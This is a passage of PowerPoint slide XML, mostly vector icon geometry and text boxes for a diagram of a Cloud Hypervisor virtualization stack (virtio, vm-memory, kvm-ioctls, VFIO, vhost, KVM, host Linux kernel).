                    <a:cubicBezTo>
                      <a:pt x="60" y="87"/>
                      <a:pt x="45" y="53"/>
                      <a:pt x="23" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="65"/>
                      <a:pt x="6" y="89"/>
                      <a:pt x="23" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="115"/>
                      <a:pt x="74" y="124"/>
                      <a:pt x="86" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="123"/>
                      <a:pt x="126" y="79"/>
                      <a:pt x="133" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="70"/>
                      <a:pt x="146" y="70"/>
                      <a:pt x="153" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="61"/>
                      <a:pt x="166" y="56"/>
                      <a:pt x="171" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="50"/>
                      <a:pt x="184" y="41"/>
                      <a:pt x="184" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="38"/>
                      <a:pt x="185" y="31"/>
                      <a:pt x="180" y="34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4" name="Freeform 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D70AF38-DEBF-1C4E-A70C-DCD3A2D5BD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71015" y="12508011"/>
                <a:ext cx="69850" cy="107950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 22"/>
                  <a:gd name="T1" fmla="*/ 16 h 34"/>
                  <a:gd name="T2" fmla="*/ 22 w 22"/>
                  <a:gd name="T3" fmla="*/ 14 h 34"/>
                  <a:gd name="T4" fmla="*/ 22 w 22"/>
                  <a:gd name="T5" fmla="*/ 0 h 34"/>
                  <a:gd name="T6" fmla="*/ 19 w 22"/>
                  <a:gd name="T7" fmla="*/ 4 h 34"/>
                  <a:gd name="T8" fmla="*/ 0 w 22"/>
                  <a:gd name="T9" fmla="*/ 21 h 34"/>
                  <a:gd name="T10" fmla="*/ 4 w 22"/>
                  <a:gd name="T11" fmla="*/ 34 h 34"/>
                  <a:gd name="T12" fmla="*/ 20 w 22"/>
                  <a:gd name="T13" fmla="*/ 1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34">
                    <a:moveTo>
                      <a:pt x="20" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="22" y="15"/>
                      <a:pt x="22" y="14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1" y="1"/>
                      <a:pt x="20" y="3"/>
                      <a:pt x="19" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="5"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="0" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="25"/>
                      <a:pt x="3" y="29"/>
                      <a:pt x="4" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="30"/>
                      <a:pt x="14" y="25"/>
                      <a:pt x="20" y="16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5" name="Freeform 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F369BC69-D760-594F-A0FA-0BAE050869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59915" y="12152411"/>
                <a:ext cx="425450" cy="425450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 130 w 134"/>
                  <a:gd name="T1" fmla="*/ 0 h 134"/>
                  <a:gd name="T2" fmla="*/ 4 w 134"/>
                  <a:gd name="T3" fmla="*/ 0 h 134"/>
                  <a:gd name="T4" fmla="*/ 0 w 134"/>
                  <a:gd name="T5" fmla="*/ 3 h 134"/>
                  <a:gd name="T6" fmla="*/ 0 w 134"/>
                  <a:gd name="T7" fmla="*/ 116 h 134"/>
                  <a:gd name="T8" fmla="*/ 4 w 134"/>
                  <a:gd name="T9" fmla="*/ 103 h 134"/>
                  <a:gd name="T10" fmla="*/ 12 w 134"/>
                  <a:gd name="T11" fmla="*/ 81 h 134"/>
                  <a:gd name="T12" fmla="*/ 12 w 134"/>
                  <a:gd name="T13" fmla="*/ 80 h 134"/>
                  <a:gd name="T14" fmla="*/ 12 w 134"/>
                  <a:gd name="T15" fmla="*/ 80 h 134"/>
                  <a:gd name="T16" fmla="*/ 22 w 134"/>
                  <a:gd name="T17" fmla="*/ 74 h 134"/>
                  <a:gd name="T18" fmla="*/ 31 w 134"/>
                  <a:gd name="T19" fmla="*/ 79 h 134"/>
                  <a:gd name="T20" fmla="*/ 32 w 134"/>
                  <a:gd name="T21" fmla="*/ 89 h 134"/>
                  <a:gd name="T22" fmla="*/ 31 w 134"/>
                  <a:gd name="T23" fmla="*/ 91 h 134"/>
                  <a:gd name="T24" fmla="*/ 32 w 134"/>
                  <a:gd name="T25" fmla="*/ 90 h 134"/>
                  <a:gd name="T26" fmla="*/ 49 w 134"/>
                  <a:gd name="T27" fmla="*/ 71 h 134"/>
                  <a:gd name="T28" fmla="*/ 57 w 134"/>
                  <a:gd name="T29" fmla="*/ 67 h 134"/>
                  <a:gd name="T30" fmla="*/ 66 w 134"/>
                  <a:gd name="T31" fmla="*/ 73 h 134"/>
                  <a:gd name="T32" fmla="*/ 66 w 134"/>
                  <a:gd name="T33" fmla="*/ 74 h 134"/>
                  <a:gd name="T34" fmla="*/ 67 w 134"/>
                  <a:gd name="T35" fmla="*/ 74 h 134"/>
                  <a:gd name="T36" fmla="*/ 76 w 134"/>
                  <a:gd name="T37" fmla="*/ 80 h 134"/>
                  <a:gd name="T38" fmla="*/ 76 w 134"/>
                  <a:gd name="T39" fmla="*/ 85 h 134"/>
                  <a:gd name="T40" fmla="*/ 82 w 134"/>
                  <a:gd name="T41" fmla="*/ 91 h 134"/>
                  <a:gd name="T42" fmla="*/ 80 w 134"/>
                  <a:gd name="T43" fmla="*/ 100 h 134"/>
                  <a:gd name="T44" fmla="*/ 83 w 134"/>
                  <a:gd name="T45" fmla="*/ 105 h 134"/>
                  <a:gd name="T46" fmla="*/ 79 w 134"/>
                  <a:gd name="T47" fmla="*/ 116 h 134"/>
                  <a:gd name="T48" fmla="*/ 66 w 134"/>
                  <a:gd name="T49" fmla="*/ 126 h 134"/>
                  <a:gd name="T50" fmla="*/ 56 w 134"/>
                  <a:gd name="T51" fmla="*/ 134 h 134"/>
                  <a:gd name="T52" fmla="*/ 130 w 134"/>
                  <a:gd name="T53" fmla="*/ 134 h 134"/>
                  <a:gd name="T54" fmla="*/ 134 w 134"/>
                  <a:gd name="T55" fmla="*/ 130 h 134"/>
                  <a:gd name="T56" fmla="*/ 134 w 134"/>
                  <a:gd name="T57" fmla="*/ 3 h 134"/>
                  <a:gd name="T58" fmla="*/ 130 w 134"/>
                  <a:gd name="T59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34" h="134">
                    <a:moveTo>
                      <a:pt x="130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1" y="113"/>
                      <a:pt x="3" y="109"/>
                      <a:pt x="4" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="97"/>
                      <a:pt x="12" y="81"/>
                      <a:pt x="12" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="80"/>
                      <a:pt x="12" y="80"/>
                      <a:pt x="12" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="80"/>
                      <a:pt x="12" y="80"/>
                      <a:pt x="12" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="76"/>
                      <a:pt x="18" y="74"/>
                      <a:pt x="22" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="74"/>
                      <a:pt x="29" y="76"/>
                      <a:pt x="31" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="82"/>
                      <a:pt x="33" y="86"/>
                      <a:pt x="32" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="90"/>
                      <a:pt x="31" y="91"/>
                      <a:pt x="31" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="90"/>
                      <a:pt x="32" y="90"/>
                      <a:pt x="32" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="89"/>
                      <a:pt x="42" y="79"/>
                      <a:pt x="49" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="68"/>
                      <a:pt x="54" y="67"/>
                      <a:pt x="57" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="67"/>
                      <a:pt x="64" y="69"/>
                      <a:pt x="66" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="73"/>
                      <a:pt x="66" y="73"/>
                      <a:pt x="66" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="74"/>
                      <a:pt x="67" y="74"/>
                      <a:pt x="67" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="74"/>
                      <a:pt x="75" y="76"/>
                      <a:pt x="76" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="82"/>
                      <a:pt x="77" y="83"/>
                      <a:pt x="76" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="86"/>
                      <a:pt x="81" y="88"/>
                      <a:pt x="82" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="94"/>
                      <a:pt x="83" y="97"/>
                      <a:pt x="80" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="101"/>
                      <a:pt x="83" y="103"/>
                      <a:pt x="83" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="109"/>
                      <a:pt x="83" y="113"/>
                      <a:pt x="79" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="120"/>
                      <a:pt x="67" y="125"/>
                      <a:pt x="66" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="128"/>
                      <a:pt x="60" y="131"/>
                      <a:pt x="56" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="134"/>
                      <a:pt x="130" y="134"/>
                      <a:pt x="130" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="134"/>
                      <a:pt x="134" y="132"/>
                      <a:pt x="134" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="3"/>
                      <a:pt x="134" y="3"/>
                      <a:pt x="134" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="1"/>
                      <a:pt x="132" y="0"/>
                      <a:pt x="1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6" name="Freeform 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC290F76-B3A3-C145-AF8B-288E87869A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0115" y="12482611"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 20 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 20 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 3 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 3 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="22"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="1"/>
                      <a:pt x="24" y="3"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24" y="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27" name="Freeform 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4FC28F4-79B3-FC49-A111-D1A4A1531F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94865" y="12482611"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 9 w 24"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 9 w 24"/>
                  <a:gd name="T5" fmla="*/ 1 h 24"/>
                  <a:gd name="T6" fmla="*/ 5 w 24"/>
                  <a:gd name="T7" fmla="*/ 12 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 15 h 24"/>
                  <a:gd name="T10" fmla="*/ 0 w 24"/>
                  <a:gd name="T11" fmla="*/ 20 h 24"/>
                  <a:gd name="T12" fmla="*/ 4 w 24"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 21 w 24"/>
                  <a:gd name="T15" fmla="*/ 24 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17" fmla="*/ 20 h 24"/>
                  <a:gd name="T18" fmla="*/ 24 w 24"/>
                  <a:gd name="T19" fmla="*/ 3 h 24"/>
                  <a:gd name="T20" fmla="*/ 21 w 24"/>
                  <a:gd name="T2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" h="24">
                    <a:moveTo>
                      <a:pt x="21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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="5"/>
                      <a:pt x="9" y="9"/>
                      <a:pt x="5" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="13"/>
                      <a:pt x="2" y="14"/>
                      <a:pt x="0" y="1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2"/>
                      <a:pt x="2" y="24"/>
                      <a:pt x="4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2" y="24"/>
                      <a:pt x="24" y="22"/>
                      <a:pt x="24" y="20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1"/>
                      <a:pt x="22" y="0"/>
                      <a:pt x="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15" tIns="22857" rIns="45715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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Овал 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01719C08-3B32-6A40-9B6A-4DA13FD3A65F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="16297250" y="4050482"/>
              <a:ext cx="2135669" cy="1941517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2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AD5F14A-360C-8346-BB26-8A9B94F284E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480900" y="2772063"/>
            <a:ext cx="62711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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Let’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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400" b="1" dirty="0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CN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511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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256FA38D-84E6-1F4D-BE7D-A44514CCBD80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A7911B1-EC96-E743-BD56-58C26EA8361B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7314213" y="2758476"/>
            <a:ext cx="3922644" cy="2386408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2829225-C365-AA4A-89FE-965EF7047BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7504937" y="3718874"/>
            <a:ext cx="1769099" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virtio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-fs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4D6A5842-A3CF-174F-8579-D7D06641F5B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7501792" y="4580641"/>
            <a:ext cx="593897" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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block</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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6E83878-7EB5-E946-A0DE-C6AADEC1346F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368298" y="4194143"/>
            <a:ext cx="1769099" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-memory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C5CAFF64-96EA-6146-B4F1-AF18A507D0DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7501792" y="3235750"/>
            <a:ext cx="1769099" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acpi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4DD7ECD7-9241-FE40-B31A-43919679E05E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368298" y="3711019"/>
            <a:ext cx="1769099" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-loader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1CF6A59-A240-884E-AF3A-A9BB02D531F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368298" y="3235750"/>
            <a:ext cx="1769099" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kvm-ioctls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EFB73A59-DC3A-2D4C-88ED-2356D9191184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7501792" y="4194143"/>
            <a:ext cx="1772757" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vm-virtio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0B606EC-F007-CB43-8DBD-557606627BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8086239" y="4580641"/>
            <a:ext cx="593897" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vsock</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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04ECCCD-C4BB-B74B-89D5-1C5C731A2333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8680135" y="4580641"/>
            <a:ext cx="593897" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E75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net</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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F26FF87-3122-0042-97DB-58088444EE1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9365157" y="4625367"/>
            <a:ext cx="593897" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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VFIO</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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94EBA5AD-84F5-BE4A-A348-F445B16D092E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9949604" y="4625367"/>
            <a:ext cx="593897" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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APIC</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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D9E69B8B-C7DE-9847-9C80-8CF39CBAD82A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10543500" y="4625367"/>
            <a:ext cx="593897" cy="386499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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6B9EAD9-4028-C644-AF57-4DE73CC2174C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7314213" y="2758476"/>
            <a:ext cx="1972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/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Hypervisor</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="2000" dirty="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E8D38E0-39FE-BA4D-8DA1-6B8D59297897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996761" y="5613816"/>
            <a:ext cx="4976470" cy="926675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9892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B44C81A-C387-C146-86A4-B03051C5EEFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6257781" y="5708553"/>
            <a:ext cx="1460881" cy="386609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="001F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KVM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4605807-D40B-AC42-95A7-DB260DA34E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7788061" y="5714930"/>
            <a:ext cx="1460881" cy="386609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="001F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File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System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1D992C3-0523-CD42-B759-3B981F3D2B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9318341" y="5714930"/>
            <a:ext cx="1460881" cy="386609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="001F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Device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Driver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C0C7A37-AD64-6E49-89DC-538C57443075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011170" y="6140381"/>
            <a:ext cx="1994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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host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CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux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Kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/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044F7798-4494-804D-A4A4-5292EE6EE079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944975" y="1365405"/>
            <a:ext cx="4976470" cy="926675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B14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E0EF6AA-184F-6C4B-945C-E8640592D8BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290857" y="1803152"/>
            <a:ext cx="1460881" cy="386609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="001F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vCPU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3E855D42-3C2D-0447-B180-0F4F63546A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7821137" y="1809529"/>
            <a:ext cx="1460881" cy="386609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="001F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block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BCD3B97E-D542-A545-ABAB-2602E12DE075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9351417" y="1809529"/>
            <a:ext cx="1460881" cy="386609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
